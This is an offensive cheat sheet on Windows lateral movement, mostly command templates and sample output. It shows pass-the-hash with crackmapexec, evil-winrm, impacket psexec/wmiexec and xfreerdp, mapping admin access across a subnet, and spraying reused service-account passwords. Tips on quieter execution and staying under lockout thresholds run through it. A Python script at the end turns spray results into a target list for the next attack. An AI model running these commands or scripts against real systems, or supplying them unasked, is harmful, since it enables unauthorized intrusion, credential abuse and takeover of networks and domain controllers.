LATERAL MOVEMENT

Pass the hash (crackmapexec)

Authenticate with NTLM hash — No password needed

crackmapexec smb <target> -u <user> -H <ntlm_hash>
Example Output
crackmapexec smb 10.10.10.0/24 -u administrator -H '31d6cfe0d16ae931b73c59d7e0c089c0'
SMB  10.10.10.5   445  DC01   [+] corp\administrator:31d6cfe0d16ae931b73c59d7e0c089c0 (Pwn3d!)
SMB  10.10.10.20  445  WEB01  [+] corp\administrator:31d6cfe0d16ae931b73c59d7e0c089c0 (Pwn3d!)
SMB  10.10.10.21  445  DB01   [+] corp\administrator:31d6cfe0d16ae931b73c59d7e0c089c0 (Pwn3d!)
SMB  10.10.10.22  445  FILE01 [-] corp\administrator:31d6cfe0d16ae931b73c59d7e0c089c0 STATUS_LOGON_FAILURE
(Sprays the hash across the whole subnet; Pwn3d! marks hosts where the account is a local admin)
Note: -H takes the NT hash alone or LM:NT. The hash in the example is the NT hash of an empty password, so substitute the real one from your dump
Note: for local accounts add --local-auth. UAC remote restrictions block PtH for local admins other than the built-in RID-500 Administrator unless LocalAccountTokenFilterPolicy is set to 1
Note: crackmapexec is no longer maintained; netexec (nxc) is the maintained fork with the same syntax

Pass the hash (evil-winrm)

Interactive shell with hash — If WinRM is reachable (5985/tcp, or 5986/tcp with -S for HTTPS) and the user is in Administrators or Remote Management Users

evil-winrm -i <target> -u <user> -H <ntlm_hash>
Example Output
evil-winrm -i 10.10.10.5 -u administrator -H '31d6cfe0d16ae931b73c59d7e0c089c0'
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
corp\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
DC01
(Interactive PowerShell on the DC with hash)

Pass the hash (psexec)

Get SYSTEM shell — Uploads a service binary to ADMIN$ and installs a service, so it is loud (System log Event ID 7045, new service with a random name)

impacket-psexec <domain>/<user>@<target> -hashes :<ntlm_hash>
Example Output
impacket-psexec corp.local/administrator@10.10.10.5 -hashes :31d6cfe0d16ae931b...
[*] Requesting shares on 10.10.10.5
[*] Found writable share ADMIN$
C:\Windows\system32> whoami
nt authority\system
(-hashes takes LM:NT; the leading colon leaves the LM half empty, which every modern host accepts)

Pass the hash (wmiexec)

Semi-interactive shell — Quieter than psexec: no binary dropped, no service installed

impacket-wmiexec <domain>/<user>@<target> -hashes :<ntlm_hash>
Example Output
impacket-wmiexec corp.local/administrator@10.10.10.5 -hashes :31d6cfe0d16ae931b73c59d7e0c089c0
[*] SMBv3.0 dialect used
C:\> whoami
corp\administrator
(Quieter than psexec: commands run through WMI (DCOM, 135/tcp plus a dynamic high port) and no service is created, but each command's output is written to a temp file in ADMIN$ and read back over SMB, and cmd.exe appearing as a child of WmiPrvSE.exe is a well-known detection)

RDP with hash

GUI access with hash — Restricted Admin mode must be on (it is off by default)

xfreerdp /u:<user> /d:<domain> /pth:<ntlm_hash> /v:<target>
Example Output
xfreerdp /u:admin /pth:31d6cfe0d... /v:10.10.10.5
[INFO] Connected to 10.10.10.5
(Full GUI desktop, no password needed)
Note: Restricted Admin must be enabled on the target: HKLM\SYSTEM\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin = 0 (REG_DWORD). It is off by default, so an admin (or a shell you already have via psexec/wmiexec) has to set it
Note: in a Restricted Admin session your credentials never reach the host; anything you open from that desktop over the network authenticates as the machine account, not as you

Check admin access on subnet

Which machines can you admin? — Map your access (add --local-auth when the account is a local one)

crackmapexec smb <subnet>/24 -u <user> -p <pass>
Example Output
crackmapexec smb 10.10.10.0/24 -u john -p Password1
SMB  10.10.10.5   445  DC01   [+] corp\john:Password1 (Pwn3d!)
SMB  10.10.10.20  445  WEB01  [+] corp\john:Password1 (Pwn3d!)
SMB  10.10.10.21  445  DB01   [+] corp\john:Password1
(Admin on DC01 and WEB01; on DB01 the login is valid but john is not a local admin. A correct domain credential authenticates on every domain-joined host, so a [-] there means the password is wrong, not that the account lacks admin)

Spray cracked creds everywhere

Password reuse across machines — People reuse passwords

crackmapexec smb <subnet>/24 -u <user> -p <pass>
Example Output
crackmapexec smb 10.10.10.0/24 -u svc_sql -p 'SQLServiceP@ss!'
SMB  10.10.10.5   445  DC01   [+] corp\svc_sql:SQLServiceP@ss! (Pwn3d!)
SMB  10.10.10.20  445  WEB01  [+] corp\svc_sql:SQLServiceP@ss! (Pwn3d!)
SMB  10.10.10.21  445  DB01   [+] corp\svc_sql:SQLServiceP@ss! (Pwn3d!)
(Service account has admin on multiple servers)
Note: check the domain lockout policy (net accounts /domain) before spraying several passwords, keep attempts per account below the threshold within the observation window, and stop as soon as STATUS_ACCOUNT_LOCKED_OUT shows up
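The "Check admin access" and "Spray cracked creds" runs above both end with the same manual step: reading the result lines to see where the credential authenticated and where it is local admin. The Python below is an added example, not part of this cheat sheet and not crackmapexec code: it parses the smb result lines the tool prints into admin / valid / failed / locked buckets, sorts the admin hosts numerically for a target file, and flags a lockout so the spray can stop. The sample run is constructed.

```python
import ipaddress
import re

# One crackmapexec / netexec "smb" result line, e.g.
#   SMB  10.10.10.5   445  DC01    [+] corp\john:Password1 (Pwn3d!)
#   SMB  10.10.10.22  445  FILE01  [-] corp\john:Password1 STATUS_LOGON_FAILURE
# Banner lines use [*] and are deliberately not matched.
LINE_RE = re.compile(
    r"^SMB\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+(?P<port>\d+)\s+(?P<host>\S+)\s+"
    r"\[(?P<mark>[+-])\]\s+(?P<account>\S+)(?P<rest>.*)$"
)

ADMIN, VALID, FAILED, LOCKED = "admin", "valid", "failed", "locked"


def classify_line(line: str):
    """Return (ip, hostname, status) for a result line, or None for banners and noise."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rest = m["rest"]
    if m["mark"] == "+":
        status = ADMIN if "(Pwn3d!)" in rest else VALID   # [+] without Pwn3d! = valid login, no admin
    elif "STATUS_ACCOUNT_LOCKED_OUT" in rest:
        status = LOCKED
    else:
        status = FAILED                                   # STATUS_LOGON_FAILURE and friends
    return m["ip"], m["host"], status


def summarize(output: str):
    """Map ip -> (hostname, status) across a whole spray run; later lines for an ip win."""
    hosts = {}
    for line in output.splitlines():
        parsed = classify_line(line)
        if parsed:
            ip, host, status = parsed
            hosts[ip] = (host, status)
    return hosts


def admin_targets(output: str):
    """IPs where the credential is local admin, sorted as addresses (not as strings)."""
    hosts = summarize(output)
    return sorted((ip for ip, (_, s) in hosts.items() if s == ADMIN), key=ipaddress.ip_address)


def lockout_seen(output: str) -> bool:
    """True if any host answered STATUS_ACCOUNT_LOCKED_OUT: stop spraying this account."""
    return any(s == LOCKED for _, s in summarize(output).values())


# Constructed sample run (not real tool output) covering a banner and the three outcomes.
SAMPLE = """\
SMB  10.10.10.5   445  DC01    [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:corp.local) (signing:True) (SMBv1:False)
SMB  10.10.10.5   445  DC01    [+] corp\\john:Password1 (Pwn3d!)
SMB  10.10.10.20  445  WEB01   [+] corp\\john:Password1 (Pwn3d!)
SMB  10.10.10.21  445  DB01    [+] corp\\john:Password1
SMB  10.10.10.22  445  FILE01  [-] corp\\john:Password1 STATUS_LOGON_FAILURE
"""

if __name__ == "__main__":
    for ip in admin_targets(SAMPLE):
        print(ip)   # one IP per line: redirect to targets.txt and pass that file to crackmapexec smb
    print("lockout seen:", lockout_seen(SAMPLE))
```

Pipe a real run through it (crackmapexec smb ... | python3 this.py with sys.stdin.read() in place of SAMPLE); crackmapexec and netexec accept a file of targets in place of the CIDR, so the printed list drops straight into the next command.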